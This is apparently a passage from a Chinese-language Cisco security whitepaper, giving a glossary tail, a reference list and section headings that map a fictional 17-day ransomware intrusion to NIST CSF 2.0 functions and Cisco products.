SNA	Secure Network Analytics	安全网络分析	Cisco 的网络流量行为分析平台（原 Stealthwatch）
SOAR	Security Orchestration, Automation & Response	安全编排自动化与响应	自动化安全运营流程的技术平台
SOC	Security Operations Center	安全运营中心	集中监控、分析和响应安全事件的团队和设施
SSE	Security Service Edge	安全服务边缘	SASE 中安全功能的子集（SWG + CASB + ZTNA）
SWG	Secure Web Gateway	安全 Web 网关	检查和过滤 Web 流量以防止恶意内容和数据泄漏
TTP	Tactics, Techniques, and Procedures	战术、技术和程序	描述攻击者行为模式的标准化方法
XDR	Extended Detection and Response	扩展检测与响应	跨终端、网络、云、邮件等多源的统一检测与响应平台
ZTNA	Zero Trust Network Access	零信任网络访问	基于持续验证而非网络位置授予访问权限的安全模型

Appendix B

参考文献 References

NIST. Cybersecurity Framework (CSF) 2.0. National Institute of Standards and Technology, February 2024. nist.gov/cyberframework
MITRE. ATT&CK® for Enterprise, v15. The MITRE Corporation, 2024. attack.mitre.org
MITRE. ATT&CK® for ICS. The MITRE Corporation, 2024. attack.mitre.org/techniques/ics
Cisco Systems. Cisco Secure Firewall (FMC/FTD) Configuration Guide. Cisco, 2024.
Cisco Systems. Cisco Identity Services Engine Administrator Guide, Release 3.x. Cisco, 2024.
Cisco Systems. Cisco Secure Network Analytics (Stealthwatch) Data Sheet. Cisco, 2024.
Cisco Systems. Cisco Cyber Vision for Industrial Security. Cisco, 2024.
Cisco Systems. Cisco Secure Workload (Tetration) Overview. Cisco, 2024.
Cisco Systems. Cisco Secure Client (AnyConnect) Deployment Guide. Cisco, 2024.
Cisco Systems. Cisco Secure Access (SSE/SASE) Solution Overview. Cisco, 2024.
Cisco Systems. Cisco Secure Equipment Access Data Sheet. Cisco, 2024.
IEC. IEC 62443 – Industrial Communication Networks – Network and System Security. International Electrotechnical Commission, 2022.
Dragos, Inc. OT Cybersecurity Year in Review 2023. Dragos, 2024.

注意：本文中"某匿名"和"某匿名银行"为虚构案例，仅用于教学和演示目的。所有技术配置为示意性伪代码，不代表生产环境的实际部署。所有 Cisco 产品功能以官方文档为准。

一个普通周五下午的噩梦

🔴 攻击者的17天：全过程模拟

阶段 1：鱼叉式钓鱼 — Day 1

阶段 2：水坑 + 浏览器漏洞 — Day 2

阶段 3：PowerShell C2 建立 — Day 2-3

阶段 4：Kerberoasting 提权 — Day 5-8

阶段 5：SMB 横向移动 — Day 8-12

阶段 6：OT 网络渗透 — Day 12-15

阶段 7：勒索引爆 — Day 17

⚠ 攻击总结：17 天，零告警

为什么传统防御会失败？

🧠 什么是第一性原理思维？

第一层断裂

攻击复盘关联：

根因分析：

第二层断裂

攻击复盘关联：

根因分析：

第三层断裂

攻击复盘关联：

根因分析：

为什么选择 NIST CSF 2.0 作为主线？

📋 框架对比

🎯 选择 NIST CSF 2.0 的五个理由

📌 NIST CSF 2.0 关键更新（2024 年 2 月发布）

NIST CSF 2.0：六大核心功能详解

GOVERN（治理）

关键子类别

🔴 某匿名的治理缺失

🔵 Cisco 如何支持

IDENTIFY（识别）

关键子类别

🔴 某匿名的识别缺失

🔵 Cisco 产品映射

PROTECT（保护）

关键子类别

🔴 某匿名的保护缺失

🔵 Cisco 产品映射

DETECT（检测）

关键子类别

🔴 某匿名的检测缺失

🔵 Cisco 产品映射

RESPOND（响应）

关键子类别

🔴 某匿名的响应缺失

🔵 Cisco 产品映射

RECOVER（恢复）

关键子类别

🔴 某匿名的恢复缺失

🔵 Cisco 产品映射

📊 CSF 2.0 功能 × 某匿名攻击阶段 × Cisco 产品 速查矩阵

从攻击者视角验证防御

🏢 ATT&CK for Enterprise (v15)

🏭 ATT&CK for ICS (v15)

🔀 Enterprise vs ICS 矩阵：关键差异

目标差异

ICS 独有战术

协议差异

🤝 NIST CSF 2.0 × MITRE ATT&CK：协同增效

CSF 2.0 的角色（防御蓝图）

ATT&CK 的角色（攻击知识库）

示例：横向移动的攻防映射

🗺️ Cisco 产品 ATT&CK 覆盖热力图（简化）

八大核心产品构成完整拼图

🛡️ Cisco Secure Firewall

产品概述

NIST CSF 2.0 功能映射

行业场景

🏭 制造业场景 — 某匿名

🏦 金融业场景 — 某匿名银行

技术配置示例

客户价值指标

🔐 Cisco Identity Services Engine (ISE)

产品概述

NIST CSF 2.0 功能映射

行业场景

🏭 制造业场景 — 某匿名

🏦 金融业场景 — 某匿名银行

技术配置示例

客户价值指标

📊 CSF 2.0 功能 × 某匿名攻击阶段 × Cisco 产品速查矩阵